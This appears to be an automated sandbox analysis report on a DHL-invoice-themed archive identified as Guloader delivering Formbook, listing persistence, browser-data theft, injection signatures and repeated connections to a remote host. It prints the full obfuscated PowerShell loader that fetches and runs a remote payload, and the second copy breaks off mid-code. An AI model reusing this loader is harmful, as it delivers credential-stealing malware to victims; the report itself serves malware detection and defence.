Analysis Overview
SHA256
8c03f35fb24c46bd75a0fafc7aae84dadc959bf407dea9a6959a7d0ef9f11ca0
Threat Level: Known bad
The file 12072024_0934_11072024_DHL Invoice.rar was found to be: Known bad.
Malicious Activity Summary
Formbook
Guloader,Cloudeye
Formbook payload
Adds policy Run key to start application
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Reads user/profile data of web browsers
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of UnmapMainImage
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Modifies Internet Explorer settings
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-12 09:34
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-12 09:34
Reported
2024-07-12 09:36
Platform
win7-20240704-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3056 wrote to memory of 2496 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3056 wrote to memory of 2496 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3056 wrote to memory of 2496 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2496 wrote to memory of 2756 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 2496 wrote to memory of 2756 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 2496 wrote to memory of 2756 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\DHL.cmd"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "write 'Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne';If (${host}.CurrentCulture) {$Truncus++;}$Euforisering='SUBsTR';$Euforisering+='ing';Function Bleens($Nedrakkes){$timetalsreduktionens=$Nedrakkes.Length-$Truncus;For( $Ryotwary=4;$Ryotwary -lt $timetalsreduktionens;$Ryotwary+=5){$Mandlige+=$Nedrakkes.$Euforisering.Invoke( $Ryotwary, $Truncus);}$Mandlige;}function Eddied($Handrail){ . ($Gidseltageres) ($Handrail);}$Personifikationers137=Bleens ' MetM DokoImmazFagmi,ryslIntrl Af.aBe,y/Brud5 Rec. eac0Vild ,up(ArusWReceiUs ln ispdStamoNodewF resCogn ,raaNPassT,pgj Stfo1Crib0 St,.Soap0Zi.c;Sind LesiWame.iSludn Nar6Resq4 tla;Refu SystxRavn6Spar4.rug;Skv. AarsrAl.avTil :Indv1Cero2Hold1Lemm.B.ar0Prog) .or TypGMa me G.mcWamakTilhoAnt./For,2Toet0 Fo.1.oin0Tr,d0Udle1Pred0Spyg1Micr UngeF D miHalvr JogeMandfSkolo Kilxfors/ ecu1E.tr2 In 1 rl.Re t0Tamt ';$Affaldsbrser171=Bleens 'RappUknigsGrimeBo drSkri-DdsbAUdvegD,apeBrodnMasttdi.u ';$Theologised77=Bleens 'Bog.h AentFiddtAtalp .nds Mon:Eman/Stng/Ussee H.mcswaroEndenBracsSladt Di,rSoutaLittm None CatdFatuioo.iaSu s.Fod,cGeneoklismor.h/MisdBUrovrKrisn Bude UdvbMancyRokkg Freg ,elesig.rSteriUn.e.D bbmVanvsUnbooSvig ';$Willowiness=Bleens 'Stet> ka ';$Gidseltageres=Bleens 'Eosii fodeResuxTew. ';$Fissens='Mjsom';$Strombus = Bleens ' PhieGlosc SkrhGe uo Af. Seks%G,una synpaffapS,led,ispa Gr tThecaDo t%Clod\SkruABenteMogur SkuoErhvsLiffotrailBesndLoneaAflaaKreds.upeeUndsn Non.AntiC CheoFeasmDest ,oot&Gr,g&Buni OutmeIn rcR,dehStnnoStaa DigetRt b ';Eddied (Bleens ' nc$ ling Ac,lTilbo Coeb undaBiv.l.sta: Un,CU,deoMiset BonaPo inA,ho=Kaza(AvescAerom.rridI.dt Indl/MagecJaco skep$La eS SubtThiur.maaoKr.kmLocobL.ukuUdsksbeto)Angl ');Eddied (Bleens 'Metr$.lfag Syml VedoUnd bCiana ScolVic.:MeshMsal uFaullT qut Quai Elym Wakaforbt ,abe S.i3Broi8.mso=Flet$ PetT Burh shae.yndoTam,l,rivoDev,g,roqiSsl sVoc e CondS ak7Prod7Oms,.Ceras M sp ,eclGloriA,metMel (Balm$SaimWAppliFjerl kralLateoSplewNortiSebanCoffeAmtssG.uns For) Men ');Eddied (Bleens 'Hemi[TornNParaeR iltN,ve.M.gnSTi,eeraffrTricvMu,ri ExocTatoe.issPBisto KoniArkinredet ,alMCapiaS.ymn b sa,illgVatne Knir Tsu]Bacc:Varv: LumSQ.areJordc S,puReshrU ntiSyn,tIne yLumbPK.agrB.gyoT.ixtOveroUnmucEngioFloelMad No,d= Sca cha [WhipNIm.ee atat Men.FusiSUmque.itacLatruAntir Inci By.tA.foy toaPEpi rSoveoBesmtTot o Autc OmboBarolIn,mT Pr yStr.pR seeFoug]F,rt:,ilo:SlgtTUndelBanas an1Blet2Zeuc ');$Theologised77=$Multimate38[0];$Nonmultiple= (Bleens 'dr.a$ negKatel,fflo NumbBjrnaEnchlMisk:DeteUSax hBaf yE,sfrgil lCambi P eg poreF li=AspiN Elaecamiw ys-o,taOUnfrb,ubij.ermeFunkcPiketTurd Ov rSChriyHumpsSnapt FaceNonvm Kul.FyriN ,ndeRekltJoe,. HolWClameBldtbDe eCMarslS ioiDisce ,vinPoget');$Nonmultiple+=$Cotan[1];Eddied ($Nonmultiple);Eddied (Bleens 'Vide$VideURenuh PrayS.itr semlUn,oi ud.g ared,oe. eksH OrleImplaVentd nineFaldrProds C.e[kaut$CrysAHenhfUntifFlora MurlPlend .hisQuo.bRemorSsygsRea.eDe irShi 1Ton.7Sup,1Glau]Soci=Fro,$VictPflj,eInd,r Ti s D poSprinUnc,ia,raf.ouriThank,okaaWintt HepiUnt.oTordnSt.aeDr grDatas Cul1 Sko3Cong7Prte ');$Unto=Bleens ' awk$UdpeUSugnhAccey Ba,rVa.olPyraiRidagForbeEn.e. Mi DSkruoRemaw FernVenalArreo HelaTilbd .ntF ConiAalelMataeTre.(Skot$Sl,mTrrinhSacreMegaoFredlGaaeoBiltg,ordi ertsAegtePa edImpa7 Sol7M.cr,H,rd$Sy.kGK.isa ,ndrP.eae,uglwFosfa holiIsogtSuleeHusu)F.rs ';$Garewaite=$Cotan[0];Eddied (Bleens 'Zoha$Ha,cgIndilMirio lkkbSil.aB jdl arr:CeteWL.pao BiloFolkd St.hFngseS.nswCha,eSp.irArie=Ford(FastTTelee FlasSkamtSyds-CurePSkibaSelvtY erhBrnd Pre,$AdlyGFirsagr.drPinkeTumlwProdaanteiSchitDeadeAar.)gett ');while (!$Woodhewer) {Eddied (Bleens 'Vamo$ForegServllivsoSmilbH,emaRenslLute:PurlGSkr,otensn igaesoppSpktoSohodD tr=Umbr$Mil,tBorerUn.lu refe Mac ') ;Eddied $Unto;Eddied (Bleens 'EfteS EndtUnbia orerGl,stMynd-UninSSmatlCrose Cale.aukpBesk Para4H,da ');Eddied (Bleens 'Di,e$Forkg NullA,tooK,nsbHoveaM,rdlIndd: mpWOutfoBesmoUnc,d .urh FuneD,arwropee,oleroct,=outb( DetTUniceRuins LovtAfsk-undkPRebeaB.sotPhonhUdra To,$ TabGNiv.aOlymrPrimeElsewPresaOrgaiBlovtWogheMa t)indk ') ;Eddied (Bleens 'Al.e$ Regg SkolUniooForgbRingaflukl M s: KakSGloscB odaRev.lDistePreer P.osSk,v=Iacc$ UvigTu.ilJerkoGulnbra taFej l Sti:CresKG,gsa A.bnBr,dnPo.ei GrnbProba nmlMissiIntesTrummE.eneCigascapi+Mynp+bolt%Endr$GabeMAtteu Si l s,stAndeiFab mnd naAtritBagge Kap3 Kom8Tapp. PrecGni oM tiuSkygnPopltinte ') ;$Theologised77=$Multimate38[$Scalers];}$Grafikindhold=298359;$demodulatorers=27193;Eddied (Bleens ' Skr$K ligken.lOogoo DypbR.vaaRevolDia :,onbFAilmoVerdr.owehFje.a AfbnBewidPredlHoroe GarrRemisDeteaTryplPre,g.nde Aage=Lykk IndlG F seU ertDo t-PlayCpolioFjednPaxitO,hoeForfntractAfd In.t$Pe cG.aviaEj.tr F reA ndwUvilaZymoiMartt UnieMale ');Eddied (Bleens 'Beau$conggAngil DaloV.jbbBalnaredil Cit:InteUKonfnPrecw uneiLithsKreshInv fVedhu gral am2Term3Hjem3Nonf Vaad=Snke Kok[ViiiSEndoyBrodsMyrrt itheM nom liz.JenfC N.do .rtn PalvStemeUmorrCelet Kr ]Alle:nest: ValFPlutrsk,ioK.udmbrubBGrana .ins B,geShor6r ar4F,rsSFuldtKan.r CabiJagenO.tagUnme(Py,a$ alF Tr.oHidfr SirhNoira Pr n,ackdBetylSupee AfvrAktisEntra,hadlLandg Ban)hftb ');Eddied (Bleens ' con$ nhegP lilBarwoAp,ebEm,saSnowl Par: ParDM inyClarbkiloe Cryl hipsAden Gri,=Ugem ill[TuliSEnvey CrasbogwtSc.tedambm ,mu.ProsT TareEscaxAntitB,ho. ShiE ,qunSel cLskuoDeted,apyiLgeknPresgSu.a] Gem:Funk:UnbeAKataSAminC,urtIdiabIu fo.frilGTidseRaftt S,eS ultQuarrRegaiTricnsiphg.lka( Bug$ SmaUBo,tnCondwSnici esosDaglhGoldfAppruT.aflInbo2 ag3Poly3Hero)Brea ');Eddied (Bleens ' dde$ alg o.glTrynoPentbPrveaSvinl,dst:TidsaKettlSvinbYmteiAfmrnAlfeiLiths Su.mbec.=T.yl$ KarDMurayGen.b dvie C olovers,ore. KnosAntruDuodbGenlsNon t eslr AssiScannBombgTur,( Wei$ KloGSkytrSkria tenf ciriKr lkNeweiG.ninCa.adMogohH poo katlTramdbrai, Je.$Zymod RudeOmsvmmarko abd S.tuPenglEnviap lotDragoGus r FabeTheer IndsBomb)Rini ');Eddied $albinism;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aerosoldaasen.Com && echo t"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | econstramedia.com | udp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
Files
memory/2496-4-0x000007FEF58FE000-0x000007FEF58FF000-memory.dmp
memory/2496-5-0x000000001B780000-0x000000001BA62000-memory.dmp
memory/2496-6-0x0000000001E70000-0x0000000001E78000-memory.dmp
memory/2496-11-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp
memory/2496-10-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp
memory/2496-9-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp
memory/2496-8-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp
memory/2496-7-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp
memory/2496-12-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp
memory/2496-13-0x000007FEF58FE000-0x000007FEF58FF000-memory.dmp
memory/2496-14-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-12 09:34
Reported
2024-07-12 09:36
Platform
win10v2004-20240709-en
Max time kernel
147s
Max time network
143s
Command Line
Signatures
Formbook
Guloader,Cloudeye
Formbook payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Key created | \Registry\User\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\X8AP1N18K8P = "C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe" | C:\Windows\SysWOW64\svchost.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Reads user/profile data of web browsers
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1984 set thread context of 2240 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe |
| PID 2240 set thread context of 3428 | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | C:\Windows\Explorer.EXE |
| PID 3244 set thread context of 3428 | N/A | C:\Windows\SysWOW64\svchost.exe | C:\Windows\Explorer.EXE |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \Registry\User\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | C:\Windows\SysWOW64\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DHL.cmd"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "write 'Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne';If (${host}.CurrentCulture) {$Truncus++;}$Euforisering='SUBsTR';$Euforisering+='ing';Function Bleens($Nedrakkes){$timetalsreduktionens=$Nedrakkes.Length-$Truncus;For( $Ryotwary=4;$Ryotwary -lt $timetalsreduktionens;$Ryotwary+=5){$Mandlige+=$Nedrakkes.$Euforisering.Invoke( $Ryotwary, $Truncus);}$Mandlige;}function Eddied($Handrail){ . ($Gidseltageres) ($Handrail);}$Personifikationers137=Bleens ' MetM DokoImmazFagmi,ryslIntrl Af.aBe,y/Brud5 Rec. eac0Vild ,up(ArusWReceiUs ln ispdStamoNodewF resCogn ,raaNPassT,pgj Stfo1Crib0 St,.Soap0Zi.c;Sind LesiWame.iSludn Nar6Resq4 tla;Refu SystxRavn6Spar4.rug;Skv. AarsrAl.avTil :Indv1Cero2Hold1Lemm.B.ar0Prog) .or TypGMa me G.mcWamakTilhoAnt./For,2Toet0 Fo.1.oin0Tr,d0Udle1Pred0Spyg1Micr UngeF D miHalvr JogeMandfSkolo Kilxfors/ ecu1E.tr2 In 1 rl.Re t0Tamt ';$Affaldsbrser171=Bleens 'RappUknigsGrimeBo drSkri-DdsbAUdvegD,apeBrodnMasttdi.u ';$Theologised77=Bleens 'Bog.h AentFiddtAtalp .nds Mon:Eman/Stng/Ussee H.mcswaroEndenBracsSladt Di,rSoutaLittm None CatdFatuioo.iaSu s.Fod,cGeneoklismor.h/MisdBUrovrKrisn Bude UdvbMancyRokkg Freg ,elesig.rSteriUn.e.D bbmVanvsUnbooSvig ';$Willowiness=Bleens 'Stet> ka ';$Gidseltageres=Bleens 'Eosii fodeResuxTew. ';$Fissens='Mjsom';$Strombus = Bleens ' PhieGlosc SkrhGe uo Af. Seks%G,una synpaffapS,led,ispa Gr tThecaDo t%Clod\SkruABenteMogur SkuoErhvsLiffotrailBesndLoneaAflaaKreds.upeeUndsn Non.AntiC CheoFeasmDest ,oot&Gr,g&Buni OutmeIn rcR,dehStnnoStaa DigetRt b ';Eddied (Bleens ' nc$ ling Ac,lTilbo Coeb undaBiv.l.sta: Un,CU,deoMiset BonaPo inA,ho=Kaza(AvescAerom.rridI.dt Indl/MagecJaco skep$La eS SubtThiur.maaoKr.kmLocobL.ukuUdsksbeto)Angl ');Eddied (Bleens 'Metr$.lfag Syml VedoUnd bCiana ScolVic.:MeshMsal uFaullT qut Quai Elym Wakaforbt ,abe S.i3Broi8.mso=Flet$ PetT Burh shae.yndoTam,l,rivoDev,g,roqiSsl sVoc e CondS ak7Prod7Oms,.Ceras M sp ,eclGloriA,metMel (Balm$SaimWAppliFjerl kralLateoSplewNortiSebanCoffeAmtssG.uns For) Men ');Eddied (Bleens 'Hemi[TornNParaeR iltN,ve.M.gnSTi,eeraffrTricvMu,ri ExocTatoe.issPBisto KoniArkinredet ,alMCapiaS.ymn b sa,illgVatne Knir Tsu]Bacc:Varv: LumSQ.areJordc S,puReshrU ntiSyn,tIne yLumbPK.agrB.gyoT.ixtOveroUnmucEngioFloelMad No,d= Sca cha [WhipNIm.ee atat Men.FusiSUmque.itacLatruAntir Inci By.tA.foy toaPEpi rSoveoBesmtTot o Autc OmboBarolIn,mT Pr yStr.pR seeFoug]F,rt:,ilo:SlgtTUndelBanas an1Blet2Zeuc ');$Theologised77=$Multimate38[0];$Nonmultiple= (Bleens 'dr.a$ negKatel,fflo NumbBjrnaEnchlMisk:DeteUSax hBaf yE,sfrgil lCambi P eg poreF li=AspiN Elaecamiw ys-o,taOUnfrb,ubij.ermeFunkcPiketTurd Ov rSChriyHumpsSnapt FaceNonvm Kul.FyriN ,ndeRekltJoe,. HolWClameBldtbDe eCMarslS ioiDisce ,vinPoget');$Nonmultiple+=$Cotan[1];Eddied ($Nonmultiple);Eddied (Bleens 'Vide$VideURenuh PrayS.itr semlUn,oi ud.g ared,oe. eksH OrleImplaVentd nineFaldrProds C.e[kaut$CrysAHenhfUntifFlora MurlPlend .hisQuo.bRemorSsygsRea.eDe irShi 1Ton.7Sup,1Glau]Soci=Fro,$VictPflj,eInd,r Ti s D poSprinUnc,ia,raf.ouriThank,okaaWintt HepiUnt.oTordnSt.aeDr grDatas Cul1 Sko3Cong7Prte ');$Unto=Bleens ' awk$UdpeUSugnhAccey Ba,rVa.olPyraiRidagForbeEn.e. Mi DSkruoRemaw FernVenalArreo HelaTilbd .ntF ConiAalelMataeTre.(Skot$Sl,mTrrinhSacreMegaoFredlGaaeoBiltg,ordi ertsAegtePa edImpa7 Sol7M.cr,H,rd$Sy.kGK.isa ,ndrP.eae,uglwFosfa holiIsogtSuleeHusu)F.rs ';$Garewaite=$Cotan[0];Eddied (Bleens 'Zoha$Ha,cgIndilMirio lkkbSil.aB jdl arr:CeteWL.pao BiloFolkd St.hFngseS.nswCha,eSp.irArie=Ford(FastTTelee FlasSkamtSyds-CurePSkibaSelvtY erhBrnd Pre,$AdlyGFirsagr.drPinkeTumlwProdaanteiSchitDeadeAar.)gett ');while (!$Woodhewer) {Eddied (Bleens 'Vamo$ForegServllivsoSmilbH,emaRenslLute:PurlGSkr,otensn igaesoppSpktoSohodD tr=Umbr$Mil,tBorerUn.lu refe Mac ') ;Eddied $Unto;Eddied (Bleens 'EfteS EndtUnbia orerGl,stMynd-UninSSmatlCrose Cale.aukpBesk Para4H,da ');Eddied (Bleens 'Di,e$Forkg NullA,tooK,nsbHoveaM,rdlIndd: mpWOutfoBesmoUnc,d .urh FuneD,arwropee,oleroct,=outb( DetTUniceRuins LovtAfsk-undkPRebeaB.sotPhonhUdra To,$ TabGNiv.aOlymrPrimeElsewPresaOrgaiBlovtWogheMa t)indk ') ;Eddied (Bleens 'Al.e$ Regg SkolUniooForgbRingaflukl M s: KakSGloscB odaRev.lDistePreer P.osSk,v=Iacc$ UvigTu.ilJerkoGulnbra taFej l Sti:CresKG,gsa A.bnBr,dnPo.ei GrnbProba nmlMissiIntesTrummE.eneCigascapi+Mynp+bolt%Endr$GabeMAtteu Si l s,stAndeiFab mnd naAtritBagge Kap3 Kom8Tapp. PrecGni oM tiuSkygnPopltinte ') ;$Theologised77=$Multimate38[$Scalers];}$Grafikindhold=298359;$demodulatorers=27193;Eddied (Bleens ' Skr$K ligken.lOogoo DypbR.vaaRevolDia :,onbFAilmoVerdr.owehFje.a AfbnBewidPredlHoroe GarrRemisDeteaTryplPre,g.nde Aage=Lykk IndlG F seU ertDo t-PlayCpolioFjednPaxitO,hoeForfntractAfd In.t$Pe cG.aviaEj.tr F reA ndwUvilaZymoiMartt UnieMale ');Eddied (Bleens 'Beau$conggAngil DaloV.jbbBalnaredil Cit:InteUKonfnPrecw uneiLithsKreshInv fVedhu gral am2Term3Hjem3Nonf Vaad=Snke Kok[ViiiSEndoyBrodsMyrrt itheM nom liz.JenfC N.do .rtn PalvStemeUmorrCelet Kr ]Alle:nest: ValFPlutrsk,ioK.udmbrubBGrana .ins B,geShor6r ar4F,rsSFuldtKan.r CabiJagenO.tagUnme(Py,a$ alF Tr.oHidfr SirhNoira Pr n,ackdBetylSupee AfvrAktisEntra,hadlLandg Ban)hftb ');Eddied (Bleens ' con$ nhegP lilBarwoAp,ebEm,saSnowl Par: ParDM inyClarbkiloe Cryl hipsAden Gri,=Ugem ill[TuliSEnvey CrasbogwtSc.tedambm ,mu.ProsT TareEscaxAntitB,ho. ShiE ,qunSel cLskuoDeted,apyiLgeknPresgSu.a] Gem:Funk:UnbeAKataSAminC,urtIdiabIu fo.frilGTidseRaftt S,eS ultQuarrRegaiTricnsiphg.lka( Bug$ SmaUBo,tnCondwSnici esosDaglhGoldfAppruT.aflInbo2 ag3Poly3Hero)Brea ');Eddied (Bleens ' dde$ alg o.glTrynoPentbPrveaSvinl,dst:TidsaKettlSvinbYmteiAfmrnAlfeiLiths Su.mbec.=T.yl$ KarDMurayGen.b dvie C olovers,ore. KnosAntruDuodbGenlsNon t eslr AssiScannBombgTur,( Wei$ 